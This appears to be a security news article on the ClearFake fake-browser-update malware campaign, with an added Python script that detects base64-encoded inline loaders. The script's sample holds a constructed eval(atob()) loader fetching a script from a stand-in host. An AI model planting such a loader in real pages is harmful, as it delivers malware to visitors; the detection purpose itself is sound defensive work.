The newly discovered ClearFake malware operators have leveraged fake browser updates to infect targeted users.
Based on reports, the tactic used in this campaign resembles the social engineering methods of the SocGholish and FakeSG campaigns, which deceive users into installing fraudulent web browser updates. The individuals or groups running ClearFake use a watering hole strategy, inserting malicious JavaScript code into compromised WordPress websites.
In this process, the threat actors utilise the Keitaro TDS filtering service to reroute web traffic, leading users to fake browser update pages. These bogus update pages could mimic the download pages of popular browsers like Chrome, Edge, and Microsoft.
Once an unsuspecting user clicks the update button, the page downloads harmful payloads hosted on platforms such as Dropbox and OneDrive.
The SocGholish operators are the primary suspects in managing the new ClearFake malware.
The same group responsible for the SocGholish malware attacks last year could also be operating the new ClearFake malware, since they have consistently used the same strategy since 2022.
Late last month, ClearFake modified its code injection tactics. Previously, the injected code added a base64-encoded script to the HTML of compromised webpages; more recently, it has relied on smart contracts on the Binance Smart Chain.
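As an added example (not from the report or from any of the campaigns it describes), the following Python script flags the earlier injection pattern described above: an inline script carrying a long base64 blob that decodes to JavaScript. The sample page, the loader string and the `example.invalid` domain are constructed for the demonstration and are not real indicators.

```python
import base64
import re

# Inline <script> bodies, and runs of base64 text long enough to carry a loader.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
B64_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
# Tokens a decoded JavaScript loader typically contains; two or more count as a hit.
JS_HINTS = ("document", "createElement", "eval(", "fetch(", "http", "script")


def decode_b64(blob):
    """Decode a base64 run to text, or return None if it is not valid base64/UTF-8."""
    raw = blob.rstrip("=")
    padded = raw + "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def find_encoded_scripts(page_html):
    """Return findings for inline scripts whose base64 payloads decode to JavaScript-like text."""
    findings = []
    for match in SCRIPT_RE.finditer(page_html):
        for blob in B64_RE.findall(match.group(1)):
            decoded = decode_b64(blob)
            if decoded is None:
                continue
            hints = [h for h in JS_HINTS if h in decoded]
            if len(hints) >= 2:
                findings.append({
                    "offset": match.start(),   # where the <script> tag starts in the page
                    "b64_len": len(blob),
                    "hints": hints,
                    "preview": decoded[:60],
                })
    return findings


# Constructed sample: a benign inline script plus an injected base64 loader.
# The loader is a stand-in pointing at a reserved .invalid domain, not a real indicator.
SAMPLE_LOADER = ("var s=document.createElement('script');"
                 "s.src='https://example.invalid/update.js';document.head.appendChild(s);")
SAMPLE_B64 = base64.b64encode(SAMPLE_LOADER.encode()).decode()
SAMPLE_HTML = (
    "<html><head><script>var wpVersion='6.3';</script></head>"
    f"<body><p>Hello</p><script>eval(atob('{SAMPLE_B64}'));</script></body></html>"
)

if __name__ == "__main__":
    for finding in find_encoded_scripts(SAMPLE_HTML):
        print(finding)
```

Run it against saved copies of your site's pages; a finding is a starting point for review, since legitimate plugins also embed base64, so compare against a known-good copy before acting.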
Separate research has identified at least four distinct threat clusters employing fake browser updates for malware distribution. One of these threats could have connections to the ClearFake campaign.
In addition, another campaign linked to SocGholish malware has been active for over five years, distributing various malicious software such as AsyncRAT and NetSupport. Furthermore, a FakeSG campaign delivered the NetSupport RAT to victims’ systems.
A couple of months ago, another cluster of fake update campaigns appeared, this one featuring SmartApeSG, which downloaded the NetSupport RAT onto compromised systems.
Since fake browser updates remain one of the most prevalent techniques threat actors use to deliver malware, organisations must proactively monitor their endpoints and networks to mitigate such threats.
Lastly, indicators of compromise (IOCs) associated with this threat are now available so organisations can gain insights into the attackers’ infrastructure, attack patterns, and activities.